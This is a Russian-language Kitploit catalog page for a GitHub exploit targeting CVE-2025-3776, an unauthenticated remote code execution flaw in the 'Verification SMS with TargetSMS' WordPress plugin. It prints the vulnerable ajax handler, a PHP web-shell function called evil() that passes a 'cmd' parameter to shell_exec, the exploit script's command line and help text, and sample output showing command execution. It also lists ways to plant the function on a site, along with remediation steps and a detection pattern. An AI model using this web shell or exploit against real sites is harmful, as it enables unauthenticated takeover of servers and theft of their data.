Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3776 — Плагин WordPress Verification SMS with TargetSMS Plugin <= 1.5 уязвим к удалённому выполнению кода (RCE) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-3776
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-3776

CVE-2025-3776

Плагин WordPress Verification SMS with TargetSMS Plugin <= 1.5 уязвим к удалённому выполнению кода (RCE)

Репозиторий
7121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3776 - Удалённое выполнение кода в плагине «Verification SMS with TargetSMS» <= 1.5

Информация о плагине

  • Название плагина: Verification SMS with TargetSMS
  • Уязвимые версии: <= 1.5
  • ID CVE: CVE-2025-3776
  • Тип: Удалённое выполнение кода (RCE)
  • Классификация OWASP: A1: Инъекции
  • Серьёзность CVSS: 10.0 (Критическая)
  • Требуемые привилегии: Без аутентификации
  • Дата публикации: 23 апреля 2025

Корневая причина: ошибка программирования

Уязвимость возникает из-за использования call_user_func() для данных, контролируемых пользователем, без проверки по белому списку разрешённых функций. Это создаёт логическую ошибку, позволяющую выполнять любую существующую в памяти PHP-функцию без аутентификации, что приводит к серьёзной уязвимости удалённого выполнения кода (RCE).

Местоположение уязвимого кода

Файл: /inc/ajax.php

add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

Этот код позволяет неаутентифицированным пользователям вызывать любую функцию, существующую в памяти, включая вредоносные, если атакующий сможет их загрузить.


Как протестировать эту уязвимость

✅ Предварительные требования

Для успешной эксплуатации этой уязвимости в среде WordPress должна уже существовать вызываемая функция. Поскольку плагины и темы WordPress могут автоматически загружать функции, атакующий может внедрить собственную функцию через файл functions.php активной темы.

📍 Файл для изменения:

target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ Вставьте следующий эксплойт в конец functions.php:

function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ Это гарантирует, что функция evil() будет загружена в память и станет доступной для выполнения через call_user_func().


Шаги эксплуатации с помощью Python-скрипта

✅ Использование:

python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ Пример вывода:

[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Меню справки Python-скрипта:

usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

Поведение без инъекции

Если функция evil() или подобная ей недоступна в памяти:

  • Запрос приведёт к следующему результату:
{"status":false}
  • Это означает, что функция обратного вызова не существует, и эксплуатация безопасно завершается неудачей.

Реальные пути эксплуатации

  • Инъекция в файлы темы: Измените файл functions.php активной темы (как показано выше).
  • Через плагины файлового менеджера: Используйте любой плагин, например WP File Manager, чтобы загрузить PHP-файл, содержащий функцию evil().
  • Через LFI или ошибки включения файлов: Используйте существующую уязвимость локального включения файлов (LFI), чтобы подключить загруженный файл, содержащий вредоносную функцию.

Риск и последствия

После загрузки вредоносной функции неаутентифицированный атакующий может:

  • Выполнять произвольные команды оболочки
  • Просматривать конфиденциальные файлы сервера
  • Перейти к полной компрометации сайта или сервера

Рекомендация

  • Немедленно отключите или удалите плагин, если используется версия <= 1.5
  • Ограничьте доступ к редактированию файлов через wp-admin
  • Исправьте или замените плагин на безопасные альтернативы

Обнаружение

Ищите повторяющиеся POST-запросы к:

/wp-admin/admin-ajax.php?action=targetvrHHndler

С параметром callback=evil или любыми неожиданными именами функций


Отказ от ответственности

Эта информация предоставлена исключительно в образовательных целях и для этических исследований. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый в результате использования этой информации.


Авторство эксплойта

Автор эксплойта: Nxploited (Khaled Alenazi)

Скачать инструмент